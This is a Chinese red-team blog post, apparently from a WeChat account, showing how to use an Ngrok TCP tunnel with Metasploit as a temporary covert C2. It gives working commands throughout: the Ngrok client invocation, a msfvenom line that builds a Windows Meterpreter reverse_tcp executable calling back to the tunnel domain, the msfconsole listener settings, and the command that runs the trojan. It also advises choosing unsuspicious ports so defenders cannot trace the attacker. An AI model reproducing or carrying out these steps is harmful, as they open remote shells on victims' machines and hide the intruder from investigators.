渗透攻击红队
一个专注于红队攻击的公众号
大家好,这里是 渗透攻击红队 的第 55 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新
Ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。
反向代理在计算机网络中是代理服务器的一种。服务器根据客户端的请求,从其关系的一组或多组后端服务器(如Web服务器)上获取资源,然后再将这些资源返回给客户端,客户端只会得知反向代理的IP地址,而不知道在代理服务器后面的服务器集群的存在。
通过利用 Ngrok 我们可以使用最少的成本去通过 Metasploit 隐蔽自己,从而达到目标很难追踪到自己。
内网 Kali 通过 Ngrok 穿透反弹 shell 到 Metasploit
具体演示
首先要去下载一个 Ngrok 客户端:https://www.ngrok.cc/download.html
这里主要选择 tcp 隧道,然后本地端口也就是 Kail 要监听的端口,我这里选了8888 端口(在实际攻击场景中尽量选择一些不让人怀疑的高端口,例如 26458 等等,别设置例如:4444 、5555、6666 这种端口,具体原因不必多说),然后会有一个域名和隧道ID:
然后在 Kali 上运行 Ngrok:
./sunny clientid 你的隧道id
这个时候就做好内网穿透了!因为是通过 Kali 本机的 8888 端口给转发到 Ngrok 的 10073,所以就得生成一个反向,然后端口是 10073 的木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxxx.xxxx.com LPORT=10073 -f exe > 8888.exe
最后 Kali 打开 MSF 控制台 msfconsole 开启监听(注意这里的端口需要设置为 8888,ip设置为本地 127.0.0.1 ):
msf > set lhost 127.0.0.1
msf > set lport 8888
msf > exploit
最后运行 8888.exe 成功反弹 Meterpreter 到 Metasploit:
cmd /c start 8888.exe
这样就能实现无需公网 VPS 就能反弹 Shell。通过这样的方式能够以最少的成本去隐蔽自己,当然这种方式也不是最有效的隐蔽手段,但是是最快捷的方式,通过 Ngrok 能基本上能满足大部分渗透的需求。
本文始发于微信公众号(渗透攻击红队):Ngrok + Metasploit = 暂时性隐蔽C2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论